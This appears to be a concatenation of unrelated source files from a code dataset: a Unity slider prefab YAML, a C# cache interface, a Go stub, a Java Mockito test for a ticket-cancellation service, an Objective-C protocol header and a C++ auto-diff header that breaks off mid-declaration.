100100000}\n m_GameObject: {fileID: 127278}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: c18c90a2199d9c742ae0f95fbd2fa06c, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n Slider: {fileID: 22490904}\n Handle: {fileID: 22407934}\n--- !u!114 &11427430\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: 39f2acd6dcf9f4f4c9af81ced4886ad4, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11438712\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 0.72156864, g: 0.72156864, b: 0.72156864, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: c30b6490f98cb3240a6c34e69e75a5d5, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11446796\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 0.209}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: efd7b9a745721a9429ec215224240cb0, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11447180\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 0}\n m_Type: 0\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11475534\nMonoBehaviour:\n 
m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -113659843, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Navigation:\n m_Mode: 3\n m_SelectOnUp: {fileID: 0}\n m_SelectOnDown: {fileID: 0}\n m_SelectOnLeft: {fileID: 0}\n m_SelectOnRight: {fileID: 0}\n m_Transition: 1\n m_Colors:\n m_NormalColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 1}\n m_HighlightedColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 1}\n m_PressedColor: {r: 0.78431374, g: 0.78431374, b: 0.78431374, a: 1}\n m_DisabledColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 0.5019608}\n m_ColorMultiplier: 1\n m_FadeDuration: 0.1\n m_SpriteState:\n m_HighlightedSprite: {fileID: 0}\n m_PressedSprite: {fileID: 0}\n m_DisabledSprite: {fileID: 0}\n m_AnimationTriggers:\n m_NormalTrigger: Normal\n m_HighlightedTrigger: Highlighted\n m_PressedTrigger: Pressed\n m_DisabledTrigger: Disabled\n m_Interactable: 1\n m_TargetGraphic: {fileID: 11427430}\n m_FillRect: {fileID: 22428218}\n m_HandleRect: {fileID: 22407934}\n m_Direction: 0\n m_MinValue: 0\n m_MaxValue: 1\n m_WholeNumbers: 0\n m_Value: 0.652\n m_OnValueChanged:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 11406732}\n m_MethodName: setSliderSoundVolume\n m_Mode: 0\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.UI.Slider+SliderEvent, UnityEngine.UI, Version=1.0.0.0,\n Culture=neutral, PublicKeyToken=null\n--- !u!114 &11475722\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: c30b6490f98cb3240a6c34e69e75a5d5, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11491604\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 0.153}\n m_RaycastTarget: 1\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: eccec04b76ecffb408e4145c9c3777bd, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11498694\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n 
m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -1862395651, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Delegates:\n - eventID: 13\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8255302}\n m_MethodName: Play\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n - eventID: 2\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8294126}\n m_MethodName: PlayOneShot\n m_Mode: 2\n m_Arguments:\n m_ObjectArgument: {fileID: 8300000, guid: 950e6e66be1f197459ac2cc4676f2af2,\n type: 3}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.AudioClip, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n - m_Target: {fileID: 11498930}\n m_MethodName: Retract\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n - eventID: 3\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8294126}\n m_MethodName: PlayOneShot\n m_Mode: 2\n m_Arguments:\n m_ObjectArgument: {fileID: 8300000, guid: 409e434d2f294004794cabc31135207f,\n type: 3}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.AudioClip, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n - m_Target: {fileID: 11498930}\n m_MethodName: Expand\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n delegates: []\n--- !u!114 &11498930\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: e3e6328679392734ea8291f8dc868266, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n Layers:\n - Label: Background Layer\n LayerTransform: {fileID: 22438182}\n MaxFloatDistance: 0.005\n MinFloatDistance: 0\n Shadow: {fileID: 11491604}\n ShadowOnAboveLayer: 0\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n - Label: Fill Area Layer\n LayerTransform: {fileID: 22443340}\n MaxFloatDistance: 0.005\n MinFloatDistance: 0\n Shadow: {fileID: 0}\n ShadowOnAboveLayer: 0\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n - Label: Handle Slide Area Layer\n LayerTransform: {fileID: 22471362}\n MaxFloatDistance: 0.01\n MinFloatDistance: 0\n Shadow: {fileID: 11446796}\n ShadowOnAboveLayer: 1\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n 
distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n ExpandSpeed: 0.2\n ContractSpeed: 0.2\n PushPaddingDistance: 0\n LayerDepress:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n LayerCollapse:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n LayerExpand:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n--- !u!222 &22204108\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n--- !u!222 &22254268\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n--- !u!222 &22265642\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n--- !u!222 &22269208\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n--- !u!222 &22274596\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n--- !u!222 &22299814\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n--- !u!224 &22407934\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22471362}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 0}\n m_AnchoredPosition: {x: 0.000015258789, y: 0}\n m_SizeDelta: {x: 80, y: 0}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22428218\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -0.00001071}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22443340}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 0}\n m_AnchoredPosition: {x: 2.4999847, y: 0}\n m_SizeDelta: {x: 5, y: 0}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22438182\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22490904}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 1.0403948, y: 2}\n m_SizeDelta: {x: -24.019, y: -20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22443340\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_LocalRotation: {x: 0, y: 0, 
z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -3.553e-12}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22428218}\n - {fileID: 22458224}\n m_Father: {fileID: 22490904}\n m_RootOrder: 1\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 0.000036597252, y: 2}\n m_SizeDelta: {x: -26.1, y: -20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22458224\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22443340}\n m_RootOrder: 1\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 1}\n m_AnchoredPosition: {x: 241.9, y: -0.000002861023}\n m_SizeDelta: {x: 166, y: 111.42851}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22471362\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 178996}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22407934}\n m_Father: {fileID: 22490904}\n m_RootOrder: 2\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 0, y: 2}\n m_SizeDelta: {x: -26.100006, y: 20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22490904\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22438182}\n - {fileID: 22443340}\n - {fileID: 22471362}\n m_Father: {fileID: 0}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0.5, y: 0.5}\n m_AnchorMax: {x: 0.5, y: 0.5}\n m_AnchoredPosition: {x: 0, y: -60}\n m_SizeDelta: {x: 400, y: 60}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!1001 &100100000\nPrefab:\n m_ObjectHideFlags: 1\n serializedVersion: 2\n m_Modification:\n m_TransformParent: {fileID: 0}\n m_Modifications: []\n m_RemovedComponents: []\n m_ParentPrefab: {fileID: 0}\n m_RootGameObject: {fileID: 134108}\n m_IsPrefabParent: 1\n"} {"text": "#region Copyright \n// Copyright 2017 Gigya Inc. All rights reserved.\n// \n// Licensed under the Apache License, Version 2.0 (the \"License\"); \n// you may not use this file except in compliance with the License. \n// You may obtain a copy of the License at\n// \n// http://www.apache.org/licenses/LICENSE-2.0\n// \n// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS \"AS IS\"\n// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n// ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n// POSSIBILITY OF SUCH DAMAGE.\n#endregion\n\nusing System.Runtime.Caching;\nusing Nito.AsyncEx;\n\nnamespace Gigya.Microdot.ServiceProxy.Caching\n{\n public interface ICache\n {\n AsyncLazy GetOrAdd(string key, T value, CacheItemPolicy policy);\n void Clear();\n }\n}"} {"text": "// +build ignore\n\npackage foo\n"} {"text": "package cancel.service;\n\nimport cancel.entity.NotifyInfo;\nimport cancel.entity.Order;\nimport cancel.entity.User;\nimport edu.fudan.common.util.Response;\nimport org.junit.Assert;\nimport org.junit.Before;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\nimport org.junit.runners.JUnit4;\nimport org.mockito.InjectMocks;\nimport org.mockito.Mock;\nimport org.mockito.Mockito;\nimport org.mockito.MockitoAnnotations;\nimport org.springframework.core.ParameterizedTypeReference;\nimport org.springframework.http.*;\nimport org.springframework.web.client.RestTemplate;\n\n@RunWith(JUnit4.class)\npublic class CancelServiceImplTest {\n\n @InjectMocks\n private CancelServiceImpl cancelServiceImpl;\n\n @Mock\n private RestTemplate restTemplate;\n\n private HttpHeaders headers = new HttpHeaders();\n private HttpEntity requestEntity = new HttpEntity(headers);\n\n @Before\n public void setUp() {\n MockitoAnnotations.initMocks(this);\n }\n\n @Test\n public void testCancelOrder1() {\n //mock getOrderByIdFromOrder()\n Order order = new Order();\n order.setStatus(6);\n Response response = new Response<>(1, null, order);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.cancelOrder(\"order_id\", \"login_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testCancelOrder2() {\n //mock getOrderByIdFromOrder()\n Response response = new Response<>(0, null, null);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n //mock getOrderByIdFromOrderOther()\n Order order = new Order();\n order.setStatus(6);\n Response response2 = new Response<>(1, null, order);\n ResponseEntity> re2 = new ResponseEntity<>(response2, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re2);\n Response result = cancelServiceImpl.cancelOrder(\"order_id\", \"login_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testSendEmail() {\n NotifyInfo notifyInfo = new 
NotifyInfo();\n HttpEntity requestEntity2 = new HttpEntity(notifyInfo, headers);\n ResponseEntity re = new ResponseEntity<>(true, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-notification-service:17853/api/v1/notifyservice/notification/order_cancel_success\",\n HttpMethod.POST,\n requestEntity2,\n Boolean.class)).thenReturn(re);\n Boolean result = cancelServiceImpl.sendEmail(notifyInfo, headers);\n Assert.assertTrue(result);\n }\n\n @Test\n public void testCalculateRefund1() {\n //mock getOrderByIdFromOrder()\n Order order = new Order();\n order.setStatus(6);\n Response response = new Response<>(1, null, order);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.calculateRefund(\"order_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted, Refound error\", null), result);\n }\n\n @Test\n public void testCalculateRefund2() {\n //mock getOrderByIdFromOrder()\n Response response = new Response<>(0, null, null);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n //mock getOrderByIdFromOrderOther()\n Order order = new Order();\n order.setStatus(6);\n Response response2 = new Response<>(1, null, order);\n ResponseEntity> re2 = new ResponseEntity<>(response2, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re2);\n Response result = cancelServiceImpl.calculateRefund(\"order_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testDrawbackMoney() {\n Response response = new Response<>(1, null, null);\n ResponseEntity re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-inside-payment-service:18673/api/v1/inside_pay_service/inside_payment/drawback/\" + \"userId\" + \"/\" + \"money\",\n HttpMethod.GET,\n requestEntity,\n Response.class)).thenReturn(re);\n Boolean result = cancelServiceImpl.drawbackMoney(\"money\", \"userId\", headers);\n Assert.assertTrue(result);\n }\n\n @Test\n public void testGetAccount() {\n Response response = new Response<>();\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-user-service:12342/api/v1/userservice/users/id/\" + \"orderId\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.getAccount(\"orderId\", headers);\n Assert.assertEquals(new Response(null, null, null), result);\n }\n\n}\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.\n//\n\n#import \"NSObject-Protocol.h\"\n\n@protocol NCNotificationCenterMenu \n- (void)ncMenuDNDToggle;\n- (void)ncMenuMouseUp;\n- (void)ncMenuMouseDown;\n- 
(void)ncMenugetInitialState:(void (^)(_Bool))arg1;\n@end\n\n"} {"text": "/**********************************************************************************************************************\nThis file is part of the Control Toolbox (https://github.com/ethz-adrl/control-toolbox), copyright by ETH Zurich.\nLicensed under the BSD-2 license (see LICENSE file in main directory)\n**********************************************************************************************************************/\n\n#pragma once\n\n#include \"DerivativesCppadSettings.h\"\n\nnamespace ct {\nnamespace core {\n\n#ifdef CPPAD\n\n//! Jacobian using Auto-Diff Codegeneration\n/*!\n * Uses Auto-Diff code generation to compute the Jacobian \\f$ J(x_s) = \\frac{df}{dx} |_{x=x_s} \\f$ of\n * a regular vector-valued mathematical function \\f$ y = f(x) \\f$ .\n *\n * x has IN_DIM dimension and y has OUT_DIM dimension. Thus, they can be\n * scalar functions (IN_DIM = 1, OUT_DIM = 1), fixed or variable size\n * (IN_DIM = -1, OUT_DIM = -1) functions.\n *\n * \\note In fact, this class is called Jacobian but computes also zero order derivatives\n *\n * @tparam IN_DIM Input dimensionality of the function (use Eigen::Dynamic (-1) for dynamic size)\n * @tparam OUT_DIM Output dimensionailty of the function (use Eigen::Dynamic (-1) for dynamic size)\n */\ntemplate \nclass DerivativesCppad : public Derivatives // double on purpose!\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n typedef ADScalar AD_SCALAR;\n\n typedef Eigen::Matrix IN_TYPE_AD; //!< function input vector type\n typedef Eigen::Matrix OUT_TYPE_AD; //!< function output vector type\n\n typedef Eigen::Matrix IN_TYPE_D; //!< function input vector type double\n typedef Eigen::Matrix OUT_TYPE_D; //!< function output vector type\n typedef Eigen::Matrix JAC_TYPE_D; //!< Jacobian type\n typedef Eigen::Matrix\n JAC_TYPE_ROW_MAJOR; //!< Jocobian type in row-major format\n typedef 